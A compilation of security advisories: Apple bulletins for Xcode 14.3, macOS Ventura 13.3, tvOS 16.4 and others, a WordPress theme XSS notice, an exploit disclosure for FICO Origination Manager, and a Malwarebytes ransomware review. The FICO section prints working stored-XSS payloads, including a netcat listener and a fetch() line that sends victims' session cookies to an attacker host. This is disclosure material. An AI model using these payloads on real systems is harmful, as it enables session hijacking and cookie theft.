The issue was addressed with improved memory handling. This issue is fixed in Xcode 14.3. An app may be able to execute arbitrary code out of its sandbox or with certain elevated privileges

This document describes the security content of Xcode 14.3.

**About Apple security updates**

For our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the Apple security updates page.

Apple security documents reference vulnerabilities by CVE-ID when possible.

For more information about security, see the Apple Product Security page.

**Xcode 14.3**

Released March 30, 2023

**Dev Tools**

Available for: macOS Ventura 13.0 and later

Impact: An app may be able to execute arbitrary code out of its sandbox or with certain elevated privileges

Description: The issue was addressed with improved memory handling.

CVE-2023-27967: Austin Emmitt, Senior Security Researcher at Trellix ARC

**Dev Tools**

Available for: macOS Ventura 13.0 and later

Impact: A sandboxed app may be able to collect system logs

Description: This issue was addressed with improved entitlements.

CVE-2023-27945: Mickey Jin (@patch1t)

Information about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. Contact the vendor for additional information.

Published Date: March 30, 2023

CVE-2023-27967: About the security content of Xcode 14.3

This issue was addressed with improved state management. This issue is fixed in macOS Ventura 13.3, iOS 15.7.4 and iPadOS 15.7.4, Safari 16.4, iOS 16.4 and iPadOS 16.4. A remote user may be able to cause unexpected app termination or arbitrary code execution

Released March 27, 2023

**Accessibility**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

Impact: An app may be able to access information about a user’s contacts

Description: A privacy issue was addressed with improved private data redaction for log entries.

CVE-2023-23541: Csaba Fitzl (@theevilbit) of Offensive Security

**Calendar**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

Impact: Importing a maliciously crafted calendar invitation may exfiltrate user information

Description: Multiple validation issues were addressed with improved input sanitization.

CVE-2023-27961: Rıza Sabuncu (@rizasabuncu)

**Camera**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

Impact: A sandboxed app may be able to determine which app is currently using the camera

Description: The issue was addressed with additional restrictions on the observability of app states.

CVE-2023-23543: Yiğit Can YILMAZ (@yilmazcanyigit)

**CommCenter**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

Impact: An app may be able to cause unexpected system termination or write kernel memory

Description: An out-of-bounds write issue was addressed with improved input validation.

CVE-2023-27936: Tingting Yin of Tsinghua University

**Find My**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

Impact: An app may be able to read sensitive location information

Description: A privacy issue was addressed with improved private data redaction for log entries.

CVE-2023-23537: an anonymous researcher

**FontParser**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

Impact: Processing a maliciously crafted image may result in disclosure of process memory

Description: The issue was addressed with improved memory handling.

CVE-2023-27956: Ye Zhang of Baidu Security

**Identity Services**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

Impact: An app may be able to access information about a user’s contacts

Description: A privacy issue was addressed with improved private data redaction for log entries.

CVE-2023-27928: Csaba Fitzl (@theevilbit) of Offensive Security

**ImageIO**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

Impact: Processing a maliciously crafted file may lead to unexpected app termination or arbitrary code execution

Description: An out-of-bounds read was addressed with improved bounds checking.

CVE-2023-27946: Mickey Jin (@patch1t)

**ImageIO**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

Impact: Processing a maliciously crafted image may result in disclosure of process memory

Description: The issue was addressed with improved memory handling.

CVE-2023-23535: ryuzaki

**Kernel**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

Impact: An app may be able to disclose kernel memory

Description: A validation issue was addressed with improved input sanitization.

CVE-2023-28200: Arsenii Kostromin (0x3c3e)

Entry added May 1, 2023

**Kernel**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

Impact: An app may be able to disclose kernel memory

Description: A validation issue was addressed with improved input sanitization.

CVE-2023-27941: Arsenii Kostromin (0x3c3e)

**Kernel**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2023-27969: Adam Doupé of ASU SEFCOM

**Kernel**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved bounds checks.

CVE-2023-23536: Félix Poulin-Bélanger

Entry added May 1, 2023

**Model I/O**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

Impact: Processing a maliciously crafted file may lead to unexpected app termination or arbitrary code execution

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2023-27949: Mickey Jin (@patch1t)

**NetworkExtension**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

Impact: A user in a privileged network position may be able to spoof a VPN server that is configured with EAP-only authentication on a device

Description: The issue was addressed with improved authentication.

CVE-2023-28182: Zhuowei Zhang

**Shortcuts**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

Impact: A shortcut may be able to use sensitive data with certain actions without prompting the user

Description: The issue was addressed with additional permissions checks.

CVE-2023-27963: Jubaer Alnazi Jabin of TRS Group Of Companies, and Wenchao Li and Xiaolong Bai of Alibaba Group

**WebKit**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

Impact: A website may be able to track sensitive user information

Description: The issue was addressed by removing origin information.

WebKit Bugzilla: 250837  
CVE-2023-27954: an anonymous researcher

**WebKit**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.

Description: A type confusion issue was addressed with improved checks.

WebKit Bugzilla: 251944  
CVE-2023-23529: an anonymous researcher

**WebKit Web Inspector**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution

Description: This issue was addressed with improved state management.

CVE-2023-28201: Dohyun Lee (@l33d0hyun), crixer (@pwning\_me) of SSD Labs

Entry added May 1, 2023

CVE-2023-28201: About the security content of iOS 15.7.4 and iPadOS 15.7.4

The issue was addressed with improved memory handling. This issue is fixed in macOS Ventura 13.3, tvOS 16.4, watchOS 9.4, iOS 16.4 and iPadOS 16.4. An app may be able to execute arbitrary code with kernel privileges

Released March 27, 2023

**AppleMobileFileIntegrity**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: A user may gain access to protected parts of the file system

Description: The issue was addressed with improved checks.

CVE-2023-23527: Mickey Jin (@patch1t)

**Core Bluetooth**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: Processing a maliciously crafted Bluetooth packet may result in disclosure of process memory

Description: An out-of-bounds read was addressed with improved bounds checking.

CVE-2023-23528: Jianjun Dai and Guang Gong of 360 Vulnerability Research Institute

**CoreCapture**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2023-28181: Tingting Yin of Tsinghua University

**FontParser**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: Processing a maliciously crafted image may result in disclosure of process memory

Description: The issue was addressed with improved memory handling.

CVE-2023-27956: Ye Zhang of Baidu Security

**Foundation**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: Parsing a maliciously crafted plist may lead to an unexpected app termination or arbitrary code execution

Description: An integer overflow was addressed with improved input validation.

CVE-2023-27937: an anonymous researcher

**Identity Services**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: An app may be able to access information about a user’s contacts

Description: A privacy issue was addressed with improved private data redaction for log entries.

CVE-2023-27928: Csaba Fitzl (@theevilbit) of Offensive Security

**ImageIO**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: Processing a maliciously crafted image may result in disclosure of process memory

Description: The issue was addressed with improved memory handling.

CVE-2023-23535: ryuzaki

**ImageIO**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: Processing a maliciously crafted image may result in disclosure of process memory

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2023-27929: Meysam Firouzi (@R00tkitSMM) of Mbition Mercedes-Benz Innovation Lab and  jzhu working with Trend Micro Zero Day Initiative

**Kernel**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2023-27969: Adam Doupé of ASU SEFCOM

**Kernel**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: An app with root privileges may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2023-27933: sqrtpwn

**Podcasts**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: An app may be able to access user-sensitive data

Description: The issue was addressed with improved checks.

CVE-2023-27942: Mickey Jin (@patch1t)

**TCC**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: An app may be able to access user-sensitive data

Description: This issue was addressed by removing the vulnerable code.

CVE-2023-27931: Mickey Jin (@patch1t)

**WebKit**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: Processing maliciously crafted web content may bypass Same Origin Policy

Description: This issue was addressed with improved state management.

WebKit Bugzilla: 248615  
CVE-2023-27932: an anonymous researcher

**WebKit**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: A website may be able to track sensitive user information

Description: The issue was addressed by removing origin information.

WebKit Bugzilla: 250837  
CVE-2023-27954: an anonymous researcher

CVE-2023-28181: About the security content of tvOS 16.4

A privacy issue was addressed by moving sensitive data to a more secure location. This issue is fixed in macOS Ventura 13.3. An app may be able to access user-sensitive data

Released March 27, 2023

**AMD**

Available for: macOS Ventura

Impact: An app may be able to cause unexpected system termination or write kernel memory

Description: A buffer overflow issue was addressed with improved memory handling.

CVE-2023-27968: ABC Research s.r.o.

**Apple Neural Engine**

Available for: macOS Ventura

Impact: An app may be able to break out of its sandbox

Description: This issue was addressed with improved checks.

CVE-2023-23532: Mohamed Ghannam (@\_simo36)

**AppleMobileFileIntegrity**

Available for: macOS Ventura

Impact: A user may gain access to protected parts of the file system

Description: The issue was addressed with improved checks.

CVE-2023-23527: Mickey Jin (@patch1t)

**AppleMobileFileIntegrity**

Available for: macOS Ventura

Impact: An app may be able to access user-sensitive data

Description: This issue was addressed by removing the vulnerable code.

CVE-2023-27931: Mickey Jin (@patch1t)

**Archive Utility**

Available for: macOS Ventura

Impact: An archive may be able to bypass Gatekeeper

Description: The issue was addressed with improved checks.

CVE-2023-27951: Brandon Dalton (@partyD0lphin) of Red Canary and Csaba Fitzl (@theevilbit) of Offensive Security

Entry updated May 1, 2023

**Calendar**

Available for: macOS Ventura

Impact: Importing a maliciously crafted calendar invitation may exfiltrate user information

Description: Multiple validation issues were addressed with improved input sanitization.

CVE-2023-27961: Rıza Sabuncu - twitter.com/rizasabuncu

**Camera**

Available for: macOS Ventura

Impact: A sandboxed app may be able to determine which app is currently using the camera

Description: The issue was addressed with additional restrictions on the observability of app states.

CVE-2023-23543: Yiğit Can YILMAZ (@yilmazcanyigit)

**Carbon Core**

Available for: macOS Ventura

Impact: Processing a maliciously crafted image may result in disclosure of process memory

Description: The issue was addressed with improved checks.

CVE-2023-23534: Mickey Jin (@patch1t)

**ColorSync**

Available for: macOS Ventura

Impact: An app may be able to read arbitrary files

Description: The issue was addressed with improved checks.

CVE-2023-27955: JeongOhKyea

**CommCenter**

Available for: macOS Ventura

Impact: An app may be able to cause unexpected system termination or write kernel memory

Description: An out-of-bounds write issue was addressed with improved input validation.

CVE-2023-27936: Tingting Yin of Tsinghua University

**CoreCapture**

Available for: macOS Ventura

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2023-28181: Tingting Yin of Tsinghua University

**curl**

Available for: macOS Ventura

Impact: Multiple issues in curl

Description: Multiple issues were addressed by updating curl.

CVE-2022-43551

CVE-2022-43552

**dcerpc**

Available for: macOS Ventura

Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution

Description: A memory initialization issue was addressed.

CVE-2023-27934: Aleksandar Nikolic of Cisco Talos

**dcerpc**

Available for: macOS Ventura

Impact: A user in a privileged network position may be able to cause a denial-of-service

Description: A denial-of-service issue was addressed with improved memory handling.

CVE-2023-28180: Aleksandar Nikolic of Cisco Talos

**dcerpc**

Available for: macOS Ventura

Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution

Description: The issue was addressed with improved bounds checks.

CVE-2023-27935: Aleksandar Nikolic of Cisco Talos

**dcerpc**

Available for: macOS Ventura

Impact: A remote user may be able to cause unexpected system termination or corrupt kernel memory

Description: The issue was addressed with improved memory handling.

CVE-2023-27953: Aleksandar Nikolic of Cisco Talos

CVE-2023-27958: Aleksandar Nikolic of Cisco Talos

**Display**

Available for: macOS Ventura

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved state management.

CVE-2023-27965: Proteas of Pangu Lab

**FaceTime**

Available for: macOS Ventura

Impact: An app may be able to access user-sensitive data

Description: A privacy issue was addressed by moving sensitive data to a more secure location.

CVE-2023-28190: Joshua Jones

**Find My**

Available for: macOS Ventura

Impact: An app may be able to read sensitive location information

Description: A privacy issue was addressed with improved private data redaction for log entries.

CVE-2023-23537: an anonymous researcher

**FontParser**

Available for: macOS Ventura

Impact: Processing a maliciously crafted image may result in disclosure of process memory

Description: The issue was addressed with improved memory handling.

CVE-2023-27956: Ye Zhang of Baidu Security

**Foundation**

Available for: macOS Ventura

Impact: Parsing a maliciously crafted plist may lead to an unexpected app termination or arbitrary code execution

Description: An integer overflow was addressed with improved input validation.

CVE-2023-27937: an anonymous researcher

**iCloud**

Available for: macOS Ventura

Impact: A file from an iCloud shared-by-me folder may be able to bypass Gatekeeper

Description: This was addressed with additional checks by Gatekeeper on files downloaded from an iCloud shared-by-me folder.

CVE-2023-23526: Jubaer Alnazi of TRS Group of Companies

**Identity Services**

Available for: macOS Ventura

Impact: An app may be able to access information about a user’s contacts

Description: A privacy issue was addressed with improved private data redaction for log entries.

CVE-2023-27928: Csaba Fitzl (@theevilbit) of Offensive Security

**ImageIO**

Available for: macOS Ventura

Impact: Processing a maliciously crafted image may result in disclosure of process memory

Description: The issue was addressed with improved memory handling.

CVE-2023-23535: ryuzaki

**ImageIO**

Available for: macOS Ventura

Impact: Processing a maliciously crafted image may result in disclosure of process memory

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2023-27929: Meysam Firouzi (@R00tkitSMM) of Mbition Mercedes-Benz Innovation Lab and jzhu working with Trend Micro Zero Day Initiative

**ImageIO**

Available for: macOS Ventura

Impact: Processing a maliciously crafted file may lead to unexpected app termination or arbitrary code execution

Description: An out-of-bounds read was addressed with improved bounds checking.

CVE-2023-27946: Mickey Jin (@patch1t)

**ImageIO**

Available for: macOS Ventura

Impact: Processing a maliciously crafted file may lead to unexpected app termination or arbitrary code execution

Description: A buffer overflow issue was addressed with improved memory handling.

CVE-2023-27957: Yiğit Can YILMAZ (@yilmazcanyigit)

**Kernel**

Available for: macOS Ventura

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved bounds checks.

CVE-2023-23536: Félix Poulin-Bélanger

Entry added May 1, 2023

**Kernel**

Available for: macOS Ventura

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2023-23514: Xinru Chi of Pangu Lab and Ned Williamson of Google Project Zero

CVE-2023-27969: Adam Doupé of ASU SEFCOM

**Kernel**

Available for: macOS Ventura

Impact: An app with root privileges may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2023-27933: sqrtpwn

**Kernel**

Available for: macOS Ventura

Impact: An app may be able to disclose kernel memory

Description: An out-of-bounds read issue existed that led to the disclosure of kernel memory. This was addressed with improved input validation.

CVE-2023-27941: Arsenii Kostromin (0x3c3e)

**Kernel**

Available for: macOS Ventura

Impact: An app may be able to disclose kernel memory

Description: A validation issue was addressed with improved input sanitization.

CVE-2023-28200: Arsenii Kostromin (0x3c3e)

**LaunchServices**

Available for: macOS Ventura

Impact: Files downloaded from the internet may not have the quarantine flag applied

Description: This issue was addressed with improved checks.

CVE-2023-27943: an anonymous researcher, Brandon Dalton, Milan Tenk, and Arthur Valiev

**LaunchServices**

Available for: macOS Ventura

Impact: An app may be able to gain root privileges

Description: This issue was addressed with improved checks.

CVE-2023-23525: Mickey Jin (@patch1t)

**Mail**

Available for: macOS Ventura

Impact: An app may be able to view sensitive information

Description: The issue was addressed with improved checks.

CVE-2023-28189: Mickey Jin (@patch1t)

Entry added May 1, 2023

**Model I/O**

Available for: macOS Ventura

Impact: Processing a maliciously crafted file may lead to unexpected app termination or arbitrary code execution

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2023-27949: Mickey Jin (@patch1t)

**NetworkExtension**

Available for: macOS Ventura

Impact: A user in a privileged network position may be able to spoof a VPN server that is configured with EAP-only authentication on a device

Description: The issue was addressed with improved authentication.

CVE-2023-28182: Zhuowei Zhang

**PackageKit**

Available for: macOS Ventura

Impact: An app may be able to modify protected parts of the file system

Description: A logic issue was addressed with improved checks.

CVE-2023-23538: Mickey Jin (@patch1t)

CVE-2023-27962: Mickey Jin (@patch1t)

**Photos**

Available for: macOS Ventura

Impact: Photos belonging to the Hidden Photos Album could be viewed without authentication through Visual Lookup

Description: A logic issue was addressed with improved restrictions.

CVE-2023-23523: developStorm

**Podcasts**

Available for: macOS Ventura

Impact: An app may be able to access user-sensitive data

Description: The issue was addressed with improved checks.

CVE-2023-27942: Mickey Jin (@patch1t)

**Safari**

Available for: macOS Ventura

Impact: An app may bypass Gatekeeper checks

Description: A race condition was addressed with improved locking.

CVE-2023-27952: Csaba Fitzl (@theevilbit) of Offensive Security

**Sandbox**

Available for: macOS Ventura

Impact: An app may be able to modify protected parts of the file system

Description: A logic issue was addressed with improved checks.

CVE-2023-23533: Mickey Jin (@patch1t), Koh M. Nakagawa of FFRI Security, Inc., and Csaba Fitzl (@theevilbit) of Offensive Security

**Sandbox**

Available for: macOS Ventura

Impact: An app may be able to bypass Privacy preferences

Description: A logic issue was addressed with improved validation.

CVE-2023-28178: Yiğit Can YILMAZ (@yilmazcanyigit)

**SharedFileList**

Available for: macOS Ventura

Impact: An app may be able to break out of its sandbox

Description: The issue was addressed with improved checks.

CVE-2023-27966: an anonymous researcher

Entry added May 1, 2023

**Shortcuts**

Available for: macOS Ventura

Impact: A shortcut may be able to use sensitive data with certain actions without prompting the user

Description: The issue was addressed with additional permissions checks.

CVE-2023-27963: Jubaer Alnazi Jabin of TRS Group Of Companies, and Wenchao Li and Xiaolong Bai of Alibaba Group

**System Settings**

Available for: macOS Ventura

Impact: An app may be able to access user-sensitive data

Description: A privacy issue was addressed with improved private data redaction for log entries.

CVE-2023-23542: an anonymous researcher

**System Settings**

Available for: macOS Ventura

Impact: An app may be able to read sensitive location information

Description: A permissions issue was addressed with improved validation.

CVE-2023-28192: Guilherme Rambo of Best Buddy Apps (rambo.codes)

**TCC**

Available for: macOS Ventura

Impact: An app may be able to access user-sensitive data

Description: This issue was addressed by removing the vulnerable code.

CVE-2023-27931: Mickey Jin (@patch1t)

**Vim**

Available for: macOS Ventura

Impact: Multiple issues in Vim

Description: Multiple issues were addressed by updating to Vim version 9.0.1191.

CVE-2023-0049

CVE-2023-0051

CVE-2023-0054

CVE-2023-0288

CVE-2023-0433

CVE-2023-0512

**WebKit Web Inspector**

Available for: macOS Ventura

Impact: A remote attacker may be able to cause unexpected app termination or arbitrary code execution

Description: This issue was addressed with improved state management.

CVE-2023-28201: Dohyun Lee (@l33d0hyun) and crixer (@pwning\_me) of SSD Labs

Entry added May 1, 2023

**WebKit**

Available for: macOS Ventura

Impact: Processing maliciously crafted web content may bypass Same Origin Policy

Description: This issue was addressed with improved state management.

CVE-2023-27932: an anonymous researcher

**WebKit**

Available for: macOS Ventura

Impact: A website may be able to track sensitive user information

Description: The issue was addressed by removing origin information.

CVE-2023-27954: an anonymous researcher

**XPC**

Available for: macOS Ventura

Impact: An app may be able to break out of its sandbox

Description: This issue was addressed with a new entitlement.

CVE-2023-27944: Mickey Jin (@patch1t)

CVE-2023-28190: About the security content of macOS Ventura 13.3

A memory corruption issue was addressed with improved state management. This issue is fixed in macOS Ventura 13.3, Studio Display Firmware Update 16.4. An app may be able to execute arbitrary code with kernel privileges

This document describes the security content of Studio Display Firmware Update 16.4.

**About Apple security updates**

For our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the Apple security updates page.

Apple security documents reference vulnerabilities by CVE-ID when possible.

For more information about security, see the Apple Product Security page.

**Studio Display Firmware Update 16.4**

Released March 27, 2023

**Display**

Available for: macOS Ventura 13.3 and later

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved state management.

CVE-2023-27965: Proteas of Pangu Lab

Information about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. Contact the vendor for additional information.

Published Date: March 27, 2023

CVE-2023-27965: About the security content of Studio Display Firmware Update 16.4

An out-of-bounds read issue was addressed with improved input validation. This issue is fixed in GarageBand for macOS 10.4.8. Parsing a maliciously crafted MIDI file may lead to an unexpected application termination or arbitrary code execution

This document describes the security content of GarageBand for macOS 10.4.8.

**About Apple security updates**

For our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the Apple security updates page.

Apple security documents reference vulnerabilities by CVE-ID when possible.

For more information about security, see the Apple Product Security page.

**GarageBand for macOS 10.4.8**

Released March 7, 2023

**GarageBand**

Available for: macOS Monterey 12.3 and later

Impact: An app may be able to gain elevated privileges during the installation of GarageBand

Description: This issue was addressed by removing the vulnerable code.

CVE-2023-27960: Mickey Jin (@patch1t)

**GarageBand**

Available for: macOS Monterey 12.3 and later

Impact: Parsing a maliciously crafted MIDI file may lead to an unexpected application termination or arbitrary code execution

Description: An out-of-bounds read issue was addressed with improved input validation.

CVE-2023-27938: Mickey Jin (@patch1t) of Trend Micro

Entry updated March 9, 2023

Information about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. Contact the vendor for additional information.

Published Date: March 09, 2023

CVE-2023-27938: About the security content of GarageBand for macOS 10.4.8

Auth (subscriber+) Reflected Cross-Site Scripting (XSS) vulnerability in Macho Themes NewsMag theme <= 2.4.4 versions.

**Solution**

Deactivate and delete. No reply from the vendor.

Brandon Roldan discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress Newsmag Theme. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has not been known to be fixed yet.

**2 other known vulnerabilities for this plugin**To plugin page

**Report to Patchstack Alliance bounty platform and earn monthly cash prizes.**

Learn more

CVE-2023-28493: WordPress NewsMag theme <= 2.4.4 - Reflected Cross-Site Scripting (XSS) vulnerability - Patchstack

Multiple persistent cross site scripting vulnerabilities in FICO Origination Manager Decision Module version 4.8.1 allow an attacker to execute code in the context of the victim's browser using a crafted payload. Additionally, an attacker with initial access to the application, can get the JSESSIONID cookie of another user and take over their session. These two findings can be chained together.

    # Exploit Title: Stored-XSS in FICO Origination Manager Decision Module 4.8.1 Leads to Session Hijacking# Date: 2023-05-07# Exploit Author: Matei Josephs# Vendor Homepage: https://www.fico.com/# Version: FICO Origination Manager Decision Module 4.8.1# CVE : CVE-2023-30056, CVE-2023-30057Introduction=================Multiple stored cross-site scripting (XSS) vulnerabilities in FICO Origination Manager Decision Module 4.8.1 allow to execute code in the context of the victim's browser using a crafted payload. Additionally, an attacker with initial access to the application, can get the JSESSIONID cookie of another user and take over their session. These two findings can be chained together.Proof of Concept=================All description fields when adding Categories and Products, Product Strategies, Decision Flows, Data Object References, Data Methods, Data Method Sequences, Rulesets, Decision Tables, Decision Trees, Score Models, Scenarios, or Internal Services are vulnerable to a stored XSS using the following payload:   <img/src/onerror=prompt(document.cookie)>An attacker could implement a cookie stealer as follows:  On the attacker's machine:    nc -lvnp <PORT>  In one of the vulnerable description fields:    <img/src/onerror=fetch('http://<ATTACKER-IP>:<PORT>/'+document.cookie)>When a victim would visit the page where the payload was injected, the attacker would receive their JSESSIONID cookie. The attacker could then use the JSESSIONID cookie to log into the Origination Manager Decision Module as the victim.

FICO Origination Manager Decision Module 4.8.1 XSS / Session Hijacking

LockBit maintained its position as the top ransomware attacker and was also observed expanding into the Mac space. 



(Read more...)




The post Ransomware review: May 2023 appeared first on Malwarebytes Labs.

_This article is based on research by Marcelo Rivero, Malwarebytes' ransomware specialist, who monitors information published by ransomware gangs on their Dark Web sites. In this report, "known attacks" are those where the victim didn't pay a ransom. This provides the best overall picture of ransomware activity, but the true number of attacks is far higher._

In April, LockBit maintained its position as the top ransomware attacker and was also observed expanding into the Mac space. Meanwhile, Cl0p, which dramatically expanded its attack operations in March, has gone quiet this month, despite Microsoft observing them exploiting PaperCut vulnerabilities.

LockBit's macOS ransomware is an interesting development in the threat landscape, showing that the group is dipping its toes into the historically ransomware-free Mac environment. The variant, targeting macOS arm64 architecture, first appeared on VirusTotal in November and December 2022 but went unnoticed until late April when it was discovered by MalwareHunterTeam. 

The LockBit macOS samples analyzed by Malwarebytes seem ineffective due to being unsigned, not accounting for TCC/SIP restrictions, and being riddled with bugs, like buffer overflows, causing premature termination when executed on macOS.

“The LockBit encryptor doesn’t look particularly viable in its current form, but I’m definitely going to be keeping an eye on it,” says Thomas Reed, director of Mac and mobile platforms at Malwarebytes. “The viability may improve in the future. Or it may not, if their tests aren’t promising.”

Keep an eye out, because LockBit's work in developing a macOS ransomware variant—plagued though it may currently be—could signal a trend toward more Mac-targeting ransomware in the future.

Known ransomware attacks by gang, April 2023

Known ransomware attacks by country, April 2023

Known ransomware attacks by industry sector, April 2023

**Cl0p** ransomware, which gained prominence in March by exploiting a zero-day vulnerability in GoAnywhere MFT, went comparatively silent with just four attacks in April. Nevertheless, the gang was seen last month exploiting vulnerabilities in PaperCut servers to steal corporate data. 

PaperCut is a popular printing management software which was targeted by both Cl0p and LockBit in April using two gnarly vulnerabilities: one allowing remote code execution (CVE-2023-27350) and the other enabling information disclosure (CVE-2023-27351). Once gaining initial access, Cl0p members sneakily deploy the TrueBot malware and a Cobalt Strike beacon to creep through the network, grabbing data along the way. 

Cl0p clearly has a history of exploiting platforms like Accellion FTA and GoAnywhere MFT, and now they've set their sights on PaperCut. So, if you're using PaperCut MF or NG, upgrade pronto and patch these two vulnerabilities!

**Vice Society**, notorious for targeting the education sector, has recently advanced their operations by adopting a sneaky PowerShell script for automated data theft. Discovered by Palo Alto Networks Unit 42, the new data exfiltration tool cleverly employs "living off the land" (LOTL) techniques to avoid detection. For instance, the script employs system-native cmdlets to search and exfiltrate data, minimizing its footprint and maintaining a low profile.

Separately, the **Play** ransomware group has whipped up two fancy .NET tools, Grixba and VSS Copying Tool, to make their cyberattacks more effective.

Grixba checks for antivirus programs, EDR suites, backup tools to help them plan the next steps of the attack. VSS Copying Tool, meanwhile, tiptoes around the Windows Volume Shadow Copy Service (VSS) to steal files from system snapshots and backup copies. Both tools were cooked up with the Costura .NET development tool for easy deployment on their victims' systems.

As Vice Society, Play, and other ransomware groups increasingly adopt advanced LOTL methods and sophisticated tools like Grixba, the capacity to proactively identify both malicious tools and the malicious use of legitimate tools within a network will undoubtedly become the deciding factor in an organization's defense strategy moving forward.

As for other trends, the USA still tops the charts as the most affected country, with the services industry getting the brunt of the attacks, as both have been the case all year. The **education sector** has its highest number of attackers (21) since January. Meanwhile, the **healthcare sector** saw a huge surge in attacks (37) in April, the highest it's been all year.

**New players****Akira**

Akira is a fresh ransomware hitting enterprises globally since March 2023, having already published in April the data of nine companies across different sectors like education, finance, and manufacturing. When executed, the ransomware deletes Windows Shadow Volume Copies, encrypts files with specific extensions, and appends the .akira extension to the encrypted files.

Like most ransomware gangs these days, the Akira gang steals corporate data before encrypting files for the purposes of double-extortion. So far, the leaked info published on their leak site—which looks retro and lets you navigate with typed commands—ranges from 5.9 GB to a whopping 259 GB.

